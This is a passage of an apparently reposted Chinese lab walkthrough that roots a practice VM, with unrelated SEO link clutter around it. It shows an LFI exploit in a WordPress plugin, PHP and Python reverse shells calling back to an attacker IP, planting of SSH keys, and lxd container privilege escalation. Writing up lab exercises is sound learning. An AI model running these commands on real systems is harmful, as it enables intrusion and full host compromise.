当前位置: 首页 > news >正文

wordpress 仿阿里巴巴南阳网站优化排名

wordpress 仿阿里巴巴,南阳网站优化排名,手机在线做ppt模板下载网站,不能安装wordpress前言 这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。 1 01 arp扫描,发现有一个130,再查看端口 有22,80,129,445,10123 dirb扫描目录 这…

前言

这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。

1

01

arp扫描,发现有一个130,再查看端口
在这里插入图片描述
在这里插入图片描述
有22,80,129,445,10123
dirb扫描目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里的something里面有一个jarves,应该是用户名称
在这里插入图片描述
继续找,发现upload里有cmd,应该是利用这里上传shell
在这里插入图片描述

02

/wp有一个wordpress,去搜索知道是一个平台,我们可以用wpscan去扫描wordpress,翻LFI是一个本地文件包含漏洞,不知道怎么利用,看wp要利用这里的https://www.exploit-db.com/exploits/46537/

在这里插入图片描述
打开后,找到这一行
在这里插入图片描述
在这里插入图片描述
发现用户jarves
在这里插入图片描述

/server里有一个zip,去搜索了知道,这是gila cms,没什么用处
初步信息收集完成

2

再进行上传shell操作,因为,上文提到的php文件,我这里用php提权
在这里插入图片描述

php -r ‘$sock=fsockopen(“47.192.168.157.128”,2333);exec(“/bin/sh -i <&3 >&3 2>&3”);’

在这里插入图片描述

我这里失败了,换python试试

192.168.157.130/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=…/…/…/…/…/…/…/…/…/…/home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.157.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

在这里插入图片描述
再升级shell
在这里插入图片描述

去home目录查看信息,有jarves
在这里插入图片描述
tmp里没有东西可以利用
在这里插入图片描述
查看/var,var目录的详细信息
在这里插入图片描述

查看/var/www
在这里插入图片描述
在这里插入图片描述
找到root的密码:root
我这里想去ssh连接,发现密码不对
在这里插入图片描述

3

剩下的步骤基本是看wp
要先用两个工具smbclient和enum4linux
在这里插入图片描述
在这里插入图片描述
再创建ssh公钥
在这里插入图片描述

在这里插入图片描述
将id_rsa.pub复制到tmp目录下命名位authorized_keys
在这里插入图片描述
将authorized_keys上传到目标主机的.ssh目录下
在这里插入图片描述

然后使用ssh登录到目标主机

4

发现jarves还属于lxd组
在这里插入图片描述

从github下载构建好的Alpine,然后进行执行
在这里插入图片描述
接着我们将生成的文件上传至目标机器

wget http://192.168.157.130:7777/lxd-alpine-builder/alpine-v3.14-x86_64-20240410_1650.tar.gz

接着我们使用lxd进行初始化

​lxd init

在这里插入图片描述
导入镜像

lxc image import ./alpine-v3.14-x86_64-20240410_1650.tar.gz --alias myimage

进入到容器的命令行
在这里插入图片描述

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

替换mnt/root目录下的authorized_keys文件
在这里插入图片描述

最后使用ssh连接拿到root权限

http://www.yayakq.cn/news/485581/

相关文章:

  • 网站后台建设费用wordpress页面发布失败
  • 哈尔滨哪里有做网站的python可以做网站
  • 网站改版活动合肥关键词优化平台
  • 怎么创建网站论坛上海网站设计多少钱
  • 毕业设计网站可以做什么郑州新闻头条最新消息
  • 南方数据企业网站管理系统php网站开发是学什么的
  • 个人网站备案容易吗织梦多网站
  • 免费建站系统wordpress24小时有效地址域名
  • 做电子杂志的网站dw做网站有哪些用处
  • godaddy 搭建网站跑腿小程序源码
  • 网站建设与管理提纲wordpress设置外网
  • 网站流程图制作软件龙岗网站建设费用明细
  • 网站开发不满意水头做网站
  • 哪里有网站建设开发公司租电信网站服务器吗
  • 品牌宝网站认证wordpress会员中心主题
  • 网站营销优化雄安移动网站
  • 怎么样做网站推广wordpress 加载速度
  • 建设手机网站包括哪些费用多少钱用英语怎么说
  • 网站建设所需的硬件设备wordpress的方法
  • 煤矿建设工程质量监督总站网站网站可不可以不添加源码直接添加模板
  • 微企业网站模板免费顶尖的郑州网站建设
  • 做游戏装备网站可以吗科技建筑公司网站
  • 广州网站设计找哪里建网站需要营业执照吗
  • 鼓楼区建设局网站松江新城投资建设集团有限公司网站
  • 网站建设的公司开发怎么推广产品最有效
  • 便利的集团网站建设互联网建造公司有哪些
  • 新网站建设的感想wordpress可以做
  • wordpress站点名没有更改wordpress修改主题目录
  • 上海网站建设公司地址导购网站如何做淘宝客
  • 做ppt卖给网站开发平台都有哪些